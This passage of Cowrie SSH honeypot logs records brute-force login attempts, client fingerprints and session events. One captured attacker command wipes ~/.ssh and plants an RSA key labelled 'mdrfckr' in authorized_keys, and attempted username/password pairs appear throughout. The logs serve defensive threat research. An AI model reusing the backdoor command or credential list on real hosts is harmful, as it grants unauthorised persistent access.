{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:12.230258Z","src_ip":"103.217.145.104","session":"78074e7b3d59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:12.462191Z","src_ip":"212.227.235.229","session":"060da8ba4a53"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":41804,"dst_ip":"1.2.3.4","dst_port":22,"session":"91f29c3c1536","protocol":"ssh","message":"New connection: 103.217.145.104:41804 (1.2.3.4:22) [session: 91f29c3c1536]","sensor":"my-vps","timestamp":"2025-08-26T04:15:12.490928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:15:12.491717Z","src_ip":"103.217.145.104","session":"91f29c3c1536"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:15:12.752859Z","src_ip":"103.217.145.104","session":"91f29c3c1536"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:15:13.128653Z","src_ip":"212.227.235.229","session":"060da8ba4a53"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:15:13.129431Z","src_ip":"212.227.235.229","session":"060da8ba4a53"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T04:15:13.353021Z","src_ip":"212.227.235.229","session":"10fecaf90c63"}
{"eventid":"cowrie.session.closed","duration":"28.5","message":"Connection lost after 28.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:13.353960Z","src_ip":"212.227.235.229","session":"10fecaf90c63"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:15:13.411732Z","src_ip":"212.227.235.229","session":"060da8ba4a53"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:13.412570Z","src_ip":"212.227.235.229","session":"060da8ba4a53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52726,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5dcea6defe9","protocol":"ssh","message":"New connection: 212.227.235.229:52726 (1.2.3.4:22) [session: e5dcea6defe9]","sensor":"my-vps","timestamp":"2025-08-26T04:15:13.691667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:15:13.692465Z","src_ip":"212.227.235.229","session":"e5dcea6defe9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:15:13.842501Z","src_ip":"103.217.145.104","session":"91f29c3c1536"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:15:13.975775Z","src_ip":"212.227.235.229","session":"e5dcea6defe9"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:14.103785Z","src_ip":"103.217.145.104","session":"7674ec2eeea4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:14.104588Z","src_ip":"103.217.145.104","session":"91f29c3c1536"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:15:15.151383Z","src_ip":"212.227.235.229","session":"e5dcea6defe9"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:16.437011Z","src_ip":"212.227.235.229","session":"e5dcea6defe9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42612,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c6d6a562c7b","protocol":"ssh","message":"New connection: 212.227.235.229:42612 (1.2.3.4:22) [session: 5c6d6a562c7b]","sensor":"my-vps","timestamp":"2025-08-26T04:15:16.714903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:15:16.715918Z","src_ip":"212.227.235.229","session":"5c6d6a562c7b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:15:16.994089Z","src_ip":"212.227.235.229","session":"5c6d6a562c7b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:15:18.147353Z","src_ip":"212.227.235.229","session":"5c6d6a562c7b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:18.426925Z","src_ip":"212.227.235.229","session":"5c6d6a562c7b"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:18.428527Z","src_ip":"212.227.235.229","session":"060da8ba4a53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47132,"dst_ip":"1.2.3.4","dst_port":22,"session":"a520e348087e","protocol":"ssh","message":"New connection: 212.227.235.229:47132 (1.2.3.4:22) [session: a520e348087e]","sensor":"my-vps","timestamp":"2025-08-26T04:15:24.321711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:15:24.324985Z","src_ip":"212.227.235.229","session":"a520e348087e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:15:24.572527Z","src_ip":"212.227.235.229","session":"a520e348087e"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":45770,"dst_ip":"1.2.3.4","dst_port":22,"session":"b03babe47070","protocol":"ssh","message":"New connection: 93.123.109.181:45770 (1.2.3.4:22) [session: b03babe47070]","sensor":"my-vps","timestamp":"2025-08-26T04:15:24.771176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:15:24.771910Z","src_ip":"93.123.109.181","session":"b03babe47070"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T04:15:24.791449Z","src_ip":"93.123.109.181","session":"b03babe47070"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol","message":"login attempt [sol/sol] failed","sensor":"my-vps","timestamp":"2025-08-26T04:15:24.850616Z","src_ip":"93.123.109.181","session":"b03babe47070"}
{"eventid":"cowrie.login.failed","username":"shagrath","password":"039715582364317","message":"login attempt [shagrath/039715582364317] failed","sensor":"my-vps","timestamp":"2025-08-26T04:15:25.618842Z","src_ip":"212.227.235.229","session":"a520e348087e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:25.873502Z","src_ip":"93.123.109.181","session":"b03babe47070"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:26.872805Z","src_ip":"212.227.235.229","session":"a520e348087e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35720,"dst_ip":"1.2.3.4","dst_port":22,"session":"a12924ffb7dd","protocol":"ssh","message":"New connection: 212.227.235.229:35720 (1.2.3.4:22) [session: a12924ffb7dd]","sensor":"my-vps","timestamp":"2025-08-26T04:15:33.349215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:15:33.353811Z","src_ip":"212.227.235.229","session":"a12924ffb7dd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:15:33.608099Z","src_ip":"212.227.235.229","session":"a12924ffb7dd"}
{"eventid":"cowrie.login.failed","username":"admin","password":"aerohive","message":"login attempt [admin/aerohive] failed","sensor":"my-vps","timestamp":"2025-08-26T04:15:35.992740Z","src_ip":"212.227.235.229","session":"a12924ffb7dd"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:37.655328Z","src_ip":"212.227.235.229","session":"a12924ffb7dd"}
{"eventid":"cowrie.session.closed","duration":"59.1","message":"Connection lost after 59.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:15:39.971019Z","src_ip":"212.227.235.229","session":"79734ff4531b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54366,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6ff368630f9","protocol":"ssh","message":"New connection: 212.227.235.229:54366 (1.2.3.4:22) [session: a6ff368630f9]","sensor":"my-vps","timestamp":"2025-08-26T04:15:46.950526Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51098,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfd8534d4089","protocol":"ssh","message":"New connection: 212.227.235.229:51098 (1.2.3.4:22) [session: bfd8534d4089]","sensor":"my-vps","timestamp":"2025-08-26T04:15:47.123064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:15:47.125470Z","src_ip":"212.227.235.229","session":"bfd8534d4089"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:15:47.310210Z","src_ip":"212.227.235.229","session":"a6ff368630f9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecds